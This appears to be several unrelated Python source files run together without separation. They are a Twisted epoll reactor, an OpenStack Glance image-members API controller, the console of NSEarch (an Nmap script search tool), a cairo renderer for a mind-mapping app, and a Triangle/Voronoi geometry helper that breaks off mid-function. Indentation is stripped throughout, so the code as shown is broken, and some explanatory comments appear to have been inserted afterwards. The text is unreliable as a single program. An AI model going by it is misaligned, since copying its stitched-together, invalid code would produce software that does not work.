# Copyright (c) 2001-2007 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
An epoll() based implementation of the twisted main loop.
To install the event loop (and you should do this before any connections,
listeners or connectors are added)::
from twisted.internet import epollreactor
epollreactor.install()
Maintainer: Jp Calderone
"""
import sys, errno
from zope.interface import implements
from twisted.internet.interfaces import IReactorFDSet
from twisted.python import _epoll
from twisted.python import log
from twisted.internet import posixbase, error
from twisted.internet.main import CONNECTION_LOST
_POLL_DISCONNECTED = (_epoll.HUP | _epoll.ERR)
class EPollReactor(posixbase.PosixReactorBase):
"""
A reactor that uses epoll(4).
@ivar _poller: A L{poll} which will be used to check for I/O
readiness.
@ivar _selectables: A dictionary mapping integer file descriptors to
instances of L{FileDescriptor} which have been registered with the
reactor. All L{FileDescriptors} which are currently receiving read or
write readiness notifications will be present as values in this
dictionary.
@ivar _reads: A dictionary mapping integer file descriptors to arbitrary
values (this is essentially a set). Keys in this dictionary will be
registered with C{_poller} for read readiness notifications which will
be dispatched to the corresponding L{FileDescriptor} instances in
C{_selectables}.
@ivar _writes: A dictionary mapping integer file descriptors to arbitrary
values (this is essentially a set). Keys in this dictionary will be
registered with C{_poller} for write readiness notifications which will
be dispatched to the corresponding L{FileDescriptor} instances in
C{_selectables}.
"""
implements(IReactorFDSet)
def __init__(self):
"""
Initialize epoll object, file descriptor tracking dictionaries, and the
base class.
"""
# Create the poller we're going to use. The 1024 here is just a hint
# to the kernel, it is not a hard maximum.
self._poller = _epoll.epoll(1024)
self._reads = {}
self._writes = {}
self._selectables = {}
posixbase.PosixReactorBase.__init__(self)
def _add(self, xer, primary, other, selectables, event, antievent):
"""
Private method for adding a descriptor to the event loop.
It takes care of adding it if new or modifying it if already added
for another state (read -> read/write for example).
"""
fd = xer.fileno()
if fd not in primary:
cmd = _epoll.CTL_ADD
flags = event
if fd in other:
flags |= antievent
cmd = _epoll.CTL_MOD
primary[fd] = 1
selectables[fd] = xer
# epoll_ctl can raise all kinds of IOErrors, and every one
# indicates a bug either in the reactor or application-code.
# Let them all through so someone sees a traceback and fixes
# something. We'll do the same thing for every other call to
# this method in this file.
self._poller._control(cmd, fd, flags)
def addReader(self, reader):
"""
Add a FileDescriptor for notification of data available to read.
"""
self._add(reader, self._reads, self._writes, self._selectables, _epoll.IN, _epoll.OUT)
def addWriter(self, writer):
"""
Add a FileDescriptor for notification of data available to write.
"""
self._add(writer, self._writes, self._reads, self._selectables, _epoll.OUT, _epoll.IN)
def _remove(self, xer, primary, other, selectables, event, antievent):
"""
Private method for removing a descriptor from the event loop.
It does the inverse job of _add, and also adds a check in case the fd
has gone away.
"""
fd = xer.fileno()
if fd == -1:
for fd, fdes in selectables.items():
if xer is fdes:
break
else:
return
if fd in primary:
cmd = _epoll.CTL_DEL
flags = event
if fd in other:
flags = antievent
cmd = _epoll.CTL_MOD
else:
del selectables[fd]
del primary[fd]
# See comment above _control call in _add.
self._poller._control(cmd, fd, flags)
def removeReader(self, reader):
"""
Remove a Selectable for notification of data available to read.
"""
self._remove(reader, self._reads, self._writes, self._selectables, _epoll.IN, _epoll.OUT)
def removeWriter(self, writer):
"""
Remove a Selectable for notification of data available to write.
"""
self._remove(writer, self._writes, self._reads, self._selectables, _epoll.OUT, _epoll.IN)
def removeAll(self):
"""
Remove all selectables, and return a list of them.
"""
if self.waker is not None:
fd = self.waker.fileno()
if fd in self._reads:
del self._reads[fd]
del self._selectables[fd]
result = self._selectables.values()
fds = self._selectables.keys()
self._reads.clear()
self._writes.clear()
self._selectables.clear()
for fd in fds:
try:
# Actually, we'll ignore all errors from this, since it's
# just last-chance cleanup.
self._poller._control(_epoll.CTL_DEL, fd, 0)
except IOError:
pass
if self.waker is not None:
fd = self.waker.fileno()
self._reads[fd] = 1
self._selectables[fd] = self.waker
return result
def getReaders(self):
return [self._selectables[fd] for fd in self._reads]
def getWriters(self):
return [self._selectables[fd] for fd in self._writes]
def doPoll(self, timeout):
"""
Poll the poller for new events.
"""
if timeout is None:
timeout = 1
timeout = int(timeout * 1000) # convert seconds to milliseconds
try:
# Limit the number of events to the number of io objects we're
# currently tracking (because that's maybe a good heuristic) and
# the amount of time we block to the value specified by our
# caller.
l = self._poller.wait(len(self._selectables), timeout)
except IOError, err:
if err.errno == errno.EINTR:
return
# See epoll_wait(2) for documentation on the other conditions
# under which this can fail. They can only be due to a serious
# programming error on our part, so let's just announce them
# loudly.
raise
_drdw = self._doReadOrWrite
for fd, event in l:
try:
selectable = self._selectables[fd]
except KeyError:
pass
else:
log.callWithLogger(selectable, _drdw, selectable, fd, event)
doIteration = doPoll
def _doReadOrWrite(self, selectable, fd, event):
"""
The fd is available for read or write; do the work and raise errors
if necessary.
"""
why = None
inRead = False
if event & _POLL_DISCONNECTED and not (event & _epoll.IN):
why = CONNECTION_LOST
else:
try:
if event & _epoll.IN:
why = selectable.doRead()
inRead = True
if not why and event & _epoll.OUT:
why = selectable.doWrite()
inRead = False
if selectable.fileno() != fd:
why = error.ConnectionFdescWentAway(
'Filedescriptor went away')
inRead = False
except:
log.err()
why = sys.exc_info()[1]
if why:
self._disconnectSelectable(selectable, why, inRead)
def install():
"""
Install the epoll() reactor.
"""
p = EPollReactor()
from twisted.internet.main import installReactor
installReactor(p)
__all__ = ["EPollReactor", "install"]
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import json
import webob
from glance.api import policy
from glance.common import exception
from glance.common import utils
from glance.common import wsgi
import glance.db
import glance.domain
import glance.gateway
import glance.notifier
from glance.openstack.common import timeutils
import glance.schema
import glance.store
class ImageMembersController(object):
def __init__(self, db_api=None, policy_enforcer=None, notifier=None,
store_api=None):
self.db_api = db_api or glance.db.get_api()
self.db_api.setup_db_env()
self.policy = policy_enforcer or policy.Enforcer()
self.notifier = notifier or glance.notifier.Notifier()
self.store_api = store_api or glance.store
self.gateway = glance.gateway.Gateway(self.db_api, self.store_api,
self.notifier, self.policy)
@utils.mutating
def create(self, req, image_id, member_id):
"""
Adds a membership to the image.
:param req: the Request object coming from the wsgi layer
:param image_id: the image identifier
:param member_id: the member identifier
:retval The response body is a mapping of the following form::
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}
"""
image_repo = self.gateway.get_repo(req.context)
image_member_factory = self.gateway\
.get_image_member_factory(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
new_member = image_member_factory.new_image_member(image,
member_id)
member = member_repo.add(new_member)
return member
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
except exception.Forbidden as e:
raise webob.exc.HTTPForbidden(explanation=unicode(e))
except exception.Duplicate as e:
raise webob.exc.HTTPConflict(explanation=unicode(e))
@utils.mutating
def update(self, req, image_id, member_id, status):
"""
Updates the status of a membership of the image.
:param req: the Request object coming from the wsgi layer
:param image_id: the image identifier
:param member_id: the member identifier
:param status: the new status of the image member
:retval The response body is a mapping of the following form::
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
member = member_repo.get(member_id)
member.status = status
member = member_repo.save(member)
return member
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
except exception.Forbidden as e:
raise webob.exc.HTTPForbidden(explanation=unicode(e))
except ValueError as e:
raise webob.exc.HTTPBadRequest(explanation=unicode(e))
def index(self, req, image_id):
"""
Return a list of dictionaries indicating the members of the
image, i.e., those tenants the image is shared with.
:param req: the Request object coming from the wsgi layer
:param image_id: The image identifier
:retval The response body is a mapping of the following form::
{'members': [
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}, ..
]}
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
members = []
for member in member_repo.list():
members.append(member)
return dict(members=members)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
except exception.Forbidden as e:
raise webob.exc.HTTPForbidden(explanation=unicode(e))
@utils.mutating
def delete(self, req, image_id, member_id):
"""
Removes a membership from the image.
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
member = member_repo.get(member_id)
member_repo.remove(member)
return webob.Response(body='', status=204)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
except exception.Forbidden as e:
raise webob.exc.HTTPForbidden(explanation=unicode(e))
class RequestDeserializer(wsgi.JSONRequestDeserializer):
def __init__(self):
super(RequestDeserializer, self).__init__()
def _get_request_body(self, request):
output = super(RequestDeserializer, self).default(request)
if 'body' not in output:
msg = _('Body expected in request.')
raise webob.exc.HTTPBadRequest(explanation=msg)
return output['body']
def create(self, request):
body = self._get_request_body(request)
try:
member_id = body['member']
if not member_id:
raise ValueError()
except KeyError:
msg = _("Member to be added not specified")
raise webob.exc.HTTPBadRequest(explanation=msg)
except ValueError:
msg = _("Member can't be empty")
raise webob.exc.HTTPBadRequest(explanation=msg)
return dict(member_id=member_id)
def update(self, request):
body = self._get_request_body(request)
try:
status = body['status']
except KeyError:
msg = _("Status not specified")
raise webob.exc.HTTPBadRequest(explanation=msg)
return dict(status=status)
class ResponseSerializer(wsgi.JSONResponseSerializer):
def __init__(self, schema=None):
super(ResponseSerializer, self).__init__()
self.schema = schema or get_schema()
def _format_image_member(self, member):
member_view = {}
attributes = ['member_id', 'image_id', 'status']
for key in attributes:
member_view[key] = getattr(member, key)
member_view['created_at'] = timeutils.isotime(member.created_at)
member_view['updated_at'] = timeutils.isotime(member.updated_at)
member_view['schema'] = '/v2/schemas/member'
member_view = self.schema.filter(member_view)
return member_view
def create(self, response, image_member):
image_member_view = self._format_image_member(image_member)
body = json.dumps(image_member_view, ensure_ascii=False)
response.unicode_body = unicode(body)
response.content_type = 'application/json'
def update(self, response, image_member):
image_member_view = self._format_image_member(image_member)
body = json.dumps(image_member_view, ensure_ascii=False)
response.unicode_body = unicode(body)
response.content_type = 'application/json'
def index(self, response, image_members):
image_members = image_members['members']
image_members_view = []
for image_member in image_members:
image_member_view = self._format_image_member(image_member)
image_members_view.append(image_member_view)
totalview = dict(members=image_members_view)
totalview['schema'] = '/v2/schemas/members'
body = json.dumps(totalview, ensure_ascii=False)
response.unicode_body = unicode(body)
response.content_type = 'application/json'
_MEMBER_SCHEMA = {
'member_id': {
'type': 'string',
'description': _('An identifier for the image member (tenantId)')
},
'image_id': {
'type': 'string',
'description': _('An identifier for the image'),
'pattern': ('^([0-9a-fA-F]){8}-([0-9a-fA-F]){4}-([0-9a-fA-F]){4}'
'-([0-9a-fA-F]){4}-([0-9a-fA-F]){12}$'),
},
'created_at': {
'type': 'string',
'description': _('Date and time of image member creation'),
#TODO(brian-rosmaita): our jsonschema library doesn't seem to like the
# format attribute, figure out why (and also fix in images.py)
#'format': 'date-time',
},
'updated_at': {
'type': 'string',
'description': _('Date and time of last modification of image member'),
#'format': 'date-time',
},
'status': {
'type': 'string',
'description': _('The status of this image member'),
'enum': [
'pending',
'accepted',
'rejected'
]
},
'schema': {'type': 'string'}
}
def get_schema():
properties = copy.deepcopy(_MEMBER_SCHEMA)
schema = glance.schema.Schema('member', properties)
return schema
def get_collection_schema():
member_schema = get_schema()
return glance.schema.CollectionSchema('members', member_schema)
def create_resource():
"""Image Members resource factory method"""
deserializer = RequestDeserializer()
serializer = ResponseSerializer()
controller = ImageMembersController()
return wsgi.Resource(controller, deserializer, serializer)
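# --- Hedged illustration, not part of the module above: the request bodies
# --- accepted by RequestDeserializer and the member representation produced
# --- by ResponseSerializer._format_image_member. The tenant id, UUID and
# --- timestamps are made-up sample values.
#
# create: {"member": "8989447062e04a818baf9e073fd04fa7"}
# update: {"status": "accepted"}
#
# serialized member:
# {
#     "member_id": "8989447062e04a818baf9e073fd04fa7",
#     "image_id": "71c675ab-d94f-49cd-a114-e12490b328d9",
#     "status": "accepted",
#     "created_at": "2013-09-20T19:22:19Z",
#     "updated_at": "2013-09-20T19:25:31Z",
#     "schema": "/v2/schemas/member"
# }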
## console.py
import cmd
import helper
import helpernmap
import os
import readline
from helper import *
banner ='\033[0;36m'+'''
================================================
_ _ _____ _____ _
| \ | |/ ___|| ___| | |
| \| |\ `--. | |__ __ _ _ __ ___ | |__
| . ` | `--. \| __| / _` || '__| / __|| '_ |
| |\ |/\__/ /| |___ | (_| || | | (__ | | | |
\_| \_/\____/ \____/ \__,_||_| \___||_| |_|
================================================
Version 0.4b http://goo.gl/8mFHE5 @jjtibaquira
Email: [email protected] | www.dragonjar.org
================================================
'''+'\033[0m'
class Console(cmd.Cmd):
def __init__(self):
cmd.Cmd.__init__(self)
self.prompt = "nsearch> "
self.intro = banner
self.doc_header = i18n.t("help.doc_header")
self.misc_header = i18n.t("help.misc_header")
self.undoc_header = i18n.t("help.undoc_header")
self.ruler = '='
## autocomplete definition list
serachCommands = [ 'name', 'category', 'help', 'author']
showfavOptions = ['name', 'ranking', 'help']
## Command definitions ##
def do_history(self, args):
"""Print a list of commands that have been entered"""
print self._history
def do_exit(self, args):
"""Exits from the console"""
return -1
def do_help(self, args):
"""Get help on commands
'help' or '?' with no arguments prints a list of commands for which help is available
'help <command>' or '? <command>' gives help on <command>
"""
## The only reason to define this method is for the help text in the doc string
cmd.Cmd.do_help(self, args)
## Command definitions to support Cmd object functionality ##
def do_EOF(self, args):
"""Exit on system end of file character"""
return self.do_exit(args)
## Override methods in Cmd object ##
def preloop(self):
"""Initialization before prompting user for commands.
Despite the claims in the Cmd documentation, Cmd.preloop() is not a stub.
"""
cmd.Cmd.preloop(self) ## sets up command completion
self._history = "" ## No historyory yet
self._locals = {} ## Initialize execution namespace for user
self._globals = {}
old_delims = readline.get_completer_delims()
readline.set_completer_delims(old_delims.replace('-', ''))
def postloop(self):
"""Take care of any unfinished business.
Despite the claims in the Cmd documentation, Cmd.postloop() is not a stub.
"""
cmd.Cmd.postloop(self) ## Clean up command completion
print '\033[0;36m Closing NSEarch ... :D\033[0m'
def precmd(self, line):
""" This method is called after the line has been input but before
it has been interpreted. If you want to modify the input line
before execution (for example, variable substitution) do it here.
"""
self._history += line.strip()+"\n"
return line
def postcmd(self, stop, line):
"""If you want to stop the console, return something that evaluates to true.
If you want to do some post command processing, do it here.
"""
return stop
def emptyline(self):
"""Do nothing on empty input line"""
pass
def do_clear(self, args):
""" Clear the shell """
os.system("clear")
print self.intro
def do_search(self, args):
""" Search """
search = helper.Helper(args,"search")
search.process()
def complete_search(self, text, line, begidx, endidx):
if not text:
commands = self.serachCommands[:]
else:
commands = [ f
for f in self.serachCommands
if f.startswith(text)
]
return commands
def help_search(self):
print '\n'.join([ "\n\tname : "+i18n.t("help.help_search_name")+"",
"\tcategory : "+i18n.t("help.help_search_category")+"",
"\tauthor : "+i18n.t("help.help_search_author")+"",
'\t'+i18n.t("help.help_usage")+':',
'\t\tsearch name:http',
'\t\tsearch category:exploit',
'\t\tsearch author:fyodor',
'\t\tsearch name:http category:exploit author:fyodor'])
def do_doc(self, args):
""" Display Script Documentaion"""
doc = helper.Helper(args)
doc.displayDoc()
def help_doc(self):
print "\t"+i18n.t("help.help_doc")
print "\t"+i18n.t("help.help_usage")
print "\t\t"+i18n.t("help.help_doc_exmp")
def complete_doc(self, text, line, begidx, endidx):
""" Autocomplete over the last result """
resultitems = helper.Helper()
return [i for i in resultitems.resultitems() if i.startswith(text)]
def do_last(self,args):
""" last help"""
try:
search = helper.Helper()
search.printlastResult()
except Exception, e:
os.system("clear")
print self.intro
search = helper.Helper(args,"showfav")
search.process()
def help_last(self):
print i18n.t("help.help_last")
# handler fav actions
def do_addfav(self,args):
search = helper.Helper(args,"addfav")
search.process()
def help_addfav(self):
print '\n'.join([
"\t"+i18n.t("help.help_addfav")+"",
"\tname : "+i18n.t("help.help_fav_name")+"",
"\tranking : "+i18n.t("help.help_fav_ranking")+"",
'\t'+i18n.t("help.help_usage")+':',
'\t\taddfav name:http ranking:great'])
def complete_addfav(self, text, line, begidx, endidx):
""" Autocomplete over the last result """
resultitems = helper.Helper()
return [i for i in resultitems.resultitems() if i.startswith(text)]
def do_delfav(self,args):
search = helper.Helper(args,"delfav")
search.process()
def help_delfav(self):
print '\n'.join([
"\t"+i18n.t("help.help_delfav")+"",
"\tname : "+i18n.t("help.help_fav_name")+"",
'\t'+i18n.t("help.help_usage")+':',
'\t\tdelfav name:http'])
def complete_delfav(self, text, line, begidx, endidx):
""" Autocomplete over the last result """
resultitems = helper.Helper()
return [i for i in resultitems.resultitems() if i.startswith(text)]
def do_modfav(self,args):
search = helper.Helper(args,"modfav")
search.process()
def help_modfav(self):
print '\n'.join([
"\t"+i18n.t("help.help_modfav")+"",
"\tname : "+i18n.t("help.help_search_name")+"",
"\tnewname : "+i18n.t("help.help_fav_name")+"",
"\tnewranking : "+i18n.t("help.help_fav_ranking")+"",
'\t'+i18n.t("help.help_usage")+':',
'\t\tmodfav name:http newname:http-new-script newranking:super-great'])
def complete_modfav(self, text, line, begidx, endidx):
""" Autocomplete over the last result """
resultitems = helper.Helper()
return [i for i in resultitems.resultitems() if i.startswith(text)]
def do_showfav(self,args):
search = helper.Helper(args,"showfav")
search.process()
def help_showfav(self):
print '\n'.join([
"\t"+i18n.t("help.help_showfav")+"",
"\tname : "+i18n.t("help.help_fav_name")+"",
"\tranking : "+i18n.t("help.help_fav_ranking")+"",
'\t'+i18n.t("help.help_usage")+':',
'\t\tshowfav name:http',
'\t\tshowfav ranking:great',
'\t\tshowfav name:http ranking:great'])
def complete_showfav(self, text, line, begidx, endidx):
if not text:
commands = self.showfavOptions[:]
else:
commands = [ f
for f in self.showfavOptions
if f.startswith(text)
]
return commands
def do_run(self, args):
''' Command to run templetes '''
nmap = helpernmap.HelperNmap(args)
nmap.process()
def help_run(self):
print '\n'.join([
"\t"+i18n.t("help.help_run")+"",
"\tnet : "+i18n.t("help.help_run_net")+"",
"\ttemplate : "+i18n.t("help.help_run_template")+"",
'\t'+i18n.t("help.help_usage")+':',
'\t\trun template:http net:target'])
#default action cmd class
def default(self, line):
"""Called on an input line when the command prefix is not recognized.
In that case we execute the line as Python code.
"""
try:
exec(line) in self._locals, self._globals
except Exception, e:
print e.__class__, ":", e
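# --- Hedged sketch, not in the original file: console.py only defines the
# --- Cmd subclass, so a minimal entry point to start the interactive loop
# --- (assuming the helper/i18n modules imported above are available) is:
if __name__ == '__main__':
    console = Console()
    console.cmdloop()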
# Meme: a fast mind-mapping tool
# (c) 2010 Jamie Webb - MIT license
import math, sys, pygtk, gtk, pango, cairo, random, time
class Renderer(object):
def __init__(self, style, canvas, window, w, h):
self._style = style
self._canvas = canvas
self._window = window
self._zoom = 1
self._pixmap = self._make_pixmap(w, h)
self._ctx = self._pixmap.cairo_create()
self.clear(0, 0, w, h)
self._top_arc = self._make_arc("top")
self._middle_arc = self._make_arc("middle")
self._bottom_arc = self._make_arc("bottom")
def _make_pixmap(self, w, h):
return gtk.gdk.Pixmap(self._window, w, h)
def _make_arc(self, t):
style = self._style
pix = self._make_pixmap(self._style.padx, self._style.dimy)
ctx = pix.cairo_create()
ctx.set_source_rgb(*style.background)
ctx.paint()
ctx.set_source_rgb(*style.lines)
ctx.set_line_width(style.line_width)
rx = style.padx / 2.0
ry = (style.pady + style.dimy) / 4.0
r = rx if rx < ry else ry
px2 = style.padx / 2.0
cy = style.dimy / 2.0
if t == "top":
ctx.arc(px2 + r, cy + r, r, math.pi, math.pi * 1.5)
ctx.stroke()
ctx.move_to(px2 + r, cy)
ctx.line_to(style.padx, cy)
ctx.stroke()
ctx.move_to(px2, cy + r)
ctx.line_to(px2, style.dimy)
ctx.stroke()
if t == "middle":
ctx.arc(px2 - r, cy - r, r, 0, math.pi * 0.5)
ctx.stroke()
ctx.arc(px2 - r, cy + r, r, -math.pi * 0.5, 0)
ctx.stroke()
ctx.move_to(0, cy)
ctx.rel_line_to(px2 - r, 0)
ctx.stroke()
if t == "bottom":
ctx.arc(px2 + r, cy - r, r, math.pi * 0.5, math.pi)
ctx.stroke()
ctx.move_to(px2 + r, cy)
ctx.line_to(style.padx, cy)
ctx.stroke()
ctx.move_to(px2, cy - r)
ctx.line_to(px2, 0)
ctx.stroke()
return pix
def clear_all(self, color = None):
ctx = self._ctx
ctx.set_source_rgb(*(color or self._style.background))
ctx.paint()
w, h = self._pixmap.get_size()
self.redraw(0, 0, w, h)
def clear(self, left, top, width, height, color = None):
ctx = self._ctx
ctx.set_source_rgb(*(color or self._style.background))
ctx.rectangle(left, top, width, height)
ctx.fill()
def xgap(self, left, top, width, height, delta):
self.resize(left + width + delta, 0)
self._pixmap.draw_drawable(self._pixmap.new_gc(), self._pixmap, left, top, left + delta, top, width, height)
if delta < 0:
self.clear(left + width + delta, top, abs(delta), height)
def ygap(self, width, height, top, delta):
width += self._style.marginx * 2
height += self._style.marginy
self.resize(width, height)
self._pixmap.draw_drawable(self._pixmap.new_gc(), self._pixmap, 0, top, 0, top + delta, width, height - delta)
if delta > 0:
self.clear(0, top, width, delta)
elif delta < 0:
self.clear(0, height + delta, width, -delta)
def viewport(self, width, height):
self._canvas.set_size_request(width + self._style.marginx * 2 - self._style.padx,
height + self._style.marginy * 2)
def draw_label(self, ctx, node, peer, x, y, cy, dimy2, style, current):
lo = self._make_layout(node.title)
tw, th = lo.get_pixel_size()
ctx.set_antialias(cairo.ANTIALIAS_NONE)
ctx.rectangle(x + 1, cy - dimy2 + 1, peer.inner_width - 1, style.dimy - 1)
if current:
ctx.set_source_rgb(1, 1, 0)
else:
ctx.set_source_rgb(*style.colors[node.color][1])
ctx.fill_preserve()
ctx.set_line_width(1.0)
ctx.set_source_rgb(*style.colors[node.color][0])
ctx.stroke()
ctx.move_to(x + style.innerpad, cy - dimy2 + th / 3.0)
ctx.show_layout(lo)
def draw_label_alt(self, ctx, node, peer, x, y, cy, dimy2, style, current):
lo = self._make_layout(node.title)
tw, th = lo.get_pixel_size()
if current:
ctx.set_antialias(cairo.ANTIALIAS_NONE)
ctx.rectangle(x + 1, cy - dimy2 + 1, peer.inner_width - 1, style.dimy - 1)
ctx.set_source_rgb(*style.colors[0][1])
ctx.fill_preserve()
ctx.set_line_width(1.0)
ctx.set_source_rgb(*style.colors[0][0])
ctx.stroke()
ctx.set_source_rgb(*style.colors[node.color][0])
ctx.move_to(x + style.innerpad, cy - dimy2 + th / 3.0)
ctx.show_layout(lo)
def draw_node(self, node, peer, x, y, current):
ctx = self._ctx
style = self._style
gc = self._pixmap.new_gc()
#ctx.scale(self._zoom, self._zoom)
width = peer.outer_width
height = peer.total_height
cy = int(y + height / 2.0 + 0.5)
dimy2 = int(style.dimy / 2.0 + 0.5)
dimx = peer.inner_width
self.clear(x, y, width, height)
self._canvas.queue_draw_area(x, y, width, height)
ctx.save()
self.draw_label_alt(ctx, node, peer, x, y, cy, dimy2, style, current)
ctx.restore()
n = node.count_children()
if n == 0:
return
ctx.set_line_width(style.line_width)
ctx.set_source_rgb(*style.lines)
rx = style.padx / 2.0
sp = style.dimy + style.pady
ry = sp / 4.0
r = rx if rx < ry else ry
px2 = style.padx / 2.0
pos = 0
i = 0
topline = None
bottomline = None
hline = False
for cp in peer.children():
height = cp.total_height
ccx = x + dimx + style.padx
ccy = int(y + pos + height / 2.0 + 0.5)
if i == 0:
topline = int(ccy - cy + 0.5)
elif i == n - 1:
bottomline = int(ccy - cy + 0.5)
if ccy < cy:
if i != 0:
self._pixmap.draw_drawable(gc, self._top_arc, 0, int(dimy2 - r + 0.5), x + dimx, int(ccy - r + 0.5), style.padx, int(r * 2.0 - 0.5))
elif ccy > cy:
if i != n - 1:
self._pixmap.draw_drawable(gc, self._bottom_arc, 0, int(dimy2 - r + 0.5), x + dimx, int(ccy - r + 0.5), style.padx, int(r * 2.0 - 0.5))
else:
hline = True
pos += height
i += 1
if n > 1:
ctx.move_to(x + dimx + px2, cy)
ctx.rel_line_to(0, topline)
ctx.stroke()
ctx.move_to(x + dimx + px2, cy)
ctx.rel_line_to(0, bottomline)
ctx.stroke()
if n == 1:
ctx.move_to(x + dimx, cy)
ctx.rel_line_to(px2 - r, 0)
ctx.stroke()
i = 0
pos = 0
for cp in peer.children():
height = cp.total_height
ccx = x + dimx + style.padx
ccy = int(y + pos + height / 2.0 + 0.5)
if i == 0 and ccy < cy:
self._pixmap.draw_drawable(gc, self._top_arc, 0, int(dimy2 - r + 0.5), x + dimx, int(ccy - r + 0.5), style.padx, int(r * 2.0 - 0.5))
elif i == n - 1 and ccy > cy:
self._pixmap.draw_drawable(gc, self._bottom_arc, 0, int(dimy2 - r + 0.5), x + dimx, int(ccy - r + 0.5), style.padx, int(r * 2.0 - 0.5))
pos += height
i += 1
if n != 1:
self._pixmap.draw_drawable(gc, self._middle_arc, 0,
int(dimy2 - r + 0.5), x + dimx, int(cy - r + 0.5),
style.padx, int(r * 2.0 - 0.5))
if hline:
ctx.move_to(x + dimx + px2 - r, cy)
ctx.line_to(x + dimx + style.padx, cy)
ctx.stroke()
def _make_layout(self, title):
lo = self._ctx.create_layout()
lo.set_font_description(pango.FontDescription(self._style.font))
lo.set_text(title)
return lo
def text_width(self, title):
lo = self._make_layout(title)
tw, th = lo.get_pixel_size()
return tw
def resize(self, w, h):
# Round up so we don't have to do this so often
w = (w / 200 + 1) * 200
h = (h / 200 + 1) * 200
old = self._pixmap
ow, oh = old.get_size()
if w > ow or h > oh:
self._pixmap = self._make_pixmap(max(ow, w), max(oh, h))
self._ctx = self._pixmap.cairo_create()
self._pixmap.draw_drawable(self._pixmap.new_gc(), old, 0, 0, 0, 0, ow, oh)
if w > ow:
self.clear(ow, 0, w - ow, oh)
if h > oh:
self.clear(0, oh, max(ow, w), h - oh)
def redraw(self, left, top, width, height):
gc = self._pixmap.new_gc()
self._window.draw_drawable(gc, self._pixmap, left, top, left, top, width, height)
# vim:sw=4 ts=4
from __future__ import print_function
import os
import subprocess,os.path
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.patches import Circle
from matplotlib.collections import LineCollection
from shapely import geometry
from . import field
from ..utils import point_in_polygon
def plot_geo(geo):
def plot_ring(r):
points = np.array(r.coords)
plt.plot( points[:,0],points[:,1],'k' )
plot_ring(geo.exterior)
for r in geo.interiors:
plot_ring(r)
def geo2poly(geo_poly,poly_filename):
"""
given a polygon geometry, write a triangle compatible poly
file
"""
print("Writing poly file ", poly_filename)
# and then only the exterior ring:
point_list = np.array(geo_poly.exterior.coords)
# which at least sometimes has a duplicate node at the end that
# we don't want
if np.all(point_list[0]==point_list[-1]):
point_list = point_list[:-1]
npoints = point_list.shape[0]
# triangle wants the basic planar-straight-line-graph
poly_fp = open(poly_filename,'wt')
# first line is
# First line: <# of vertices> <dimension (must be 2)> <# of attributes> <# of boundary markers (0 or 1)>
poly_fp.write("%i 2 0 0\n"%(npoints))
# Write out vertices
for i in range(npoints):
# <vertex #> <x> <y> [attributes] [boundary marker]
poly_fp.write("%i %f %f\n"%(i,point_list[i,0],point_list[i,1]))
# Write out segments
# <# of segments> <# of boundary markers (0 or 1)>
poly_fp.write("%i 0\n"%(npoints))
for i in range(npoints):
# <segment #> <endpoint> <endpoint> [boundary marker]
poly_fp.write("%i %i %i\n"%(i,i,(i+1)%npoints))
# number of holes, which for the moment we ignore:
poly_fp.write("0\n")
poly_fp.close()
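# A hedged illustration (added commentary) of the .poly file geo2poly() would
# write for a unit-square exterior ring; the coordinates are made up:
#
#   4 2 0 0                 <- n_vertices, dimension, n_attributes, n_boundary_markers
#   0 0.000000 0.000000     <- vertex: index, x, y
#   1 1.000000 0.000000
#   2 1.000000 1.000000
#   3 0.000000 1.000000
#   4 0                     <- n_segments, n_boundary_markers
#   0 0 1                   <- segment: index, endpoint, endpoint
#   1 1 2
#   2 2 3
#   3 3 0
#   0                       <- number of holes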
def load_triangle_nodes(node_filename):
"""
load nodes as output by triangle
"""
fp = open(node_filename,'rt')
n_nodes, dim, nattrs, has_boundary_markers = map(int,fp.readline().split())
nodes = np.zeros( (n_nodes,dim), np.float64)
for i in range(n_nodes):
idx,nodes[i,0],nodes[i,1] = map(float,fp.readline().split()[:3])
fp.close()
return nodes
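# A hedged illustration (added commentary) of the triangle .node layout this
# loader expects; the index column is read and discarded, and the values below
# are made up:
#
#   4 2 0 1        <- n_nodes, dimension, n_attributes, has_boundary_markers
#   0 0.0 0.0 1    <- node: index, x, y, [boundary marker]
#   1 1.0 0.0 1
#   2 1.0 1.0 1
#   3 0.0 1.0 1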
def load_triangle_edges(edge_filename):
""" load finite edges from output from triangle
"""
fp = open(edge_filename,'rt')
n_edges,n_markers = map(int,fp.readline().split())
# indexed into corresponding node file:
edges = []
for i in range(n_edges):
vals=map(int,fp.readline().split()[:3])
if vals[2] == -1:
continue # it's a ray
edges.append( vals[1:3] )
fp.close()
return np.array(edges)
def plot_voronoi(poly_filename):
vor_node = poly_filename.replace('.poly','.1.v.node')
vor_edge = poly_filename.replace('.poly','.1.v.edge')
# load the vor nodes and show them:
vor_nodes = load_triangle_nodes(vor_node)
plt.plot(vor_nodes[:,0],vor_nodes[:,1],'r+')
vor_edges = load_triangle_edges(vor_edge)
# plot the finite edges:
# build up the list of lines:
all_lines = vor_nodes[vor_edges]
